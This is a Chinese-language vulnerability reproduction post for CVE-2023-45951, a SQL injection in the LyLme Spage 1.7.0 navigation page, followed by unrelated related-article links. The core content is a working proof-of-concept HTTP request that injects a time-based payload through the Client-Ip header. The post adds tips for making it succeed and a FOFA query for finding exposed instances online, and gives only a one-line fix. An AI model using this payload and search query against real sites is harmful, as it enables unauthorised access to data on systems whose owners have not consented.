六零导航页SQL注入漏洞复现(CVE-2023-45951)

0x01 产品简介

LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。

0x02 漏洞概述

LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。

0x03 影响范围

LyLme Spage 1.7.0

0x04 复现环境

FOFA:title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

复制代码
POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'

url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=

延时10秒

PS:漏洞存在于 HTTP Header 的 Client-Ip 字段,请求体中url字段值每请求一次就需要更换一次,不然无法成功

0x06 修复建议

在get_real_ip 中检查验证IP合法性,防止SQL注入

相关推荐
花木偶1 小时前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
qq_312920112 小时前
主机安全-开源HIDS字节跳动Elkeid使用
安全
Chen--Xing2 小时前
第一届OpenHarmonyCTF--Crypto--WriteUp
网络安全·密码学·harmonyos
合作小小程序员小小店5 小时前
web渗透之指纹识别1
物联网·计算机网络·网络安全·网络攻击模型
2501_915918417 小时前
接口漏洞怎么抓?Fiddler 中文版 + Postman + Wireshark 实战指南
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网硕互联的小客服9 小时前
未来趋势:AI与量子计算对服务器安全的影响
运维·服务器·网络·网络安全·量子计算
黑客老李9 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_5219 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
ManageEngine卓豪9 小时前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
薄荷椰果抹茶10 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全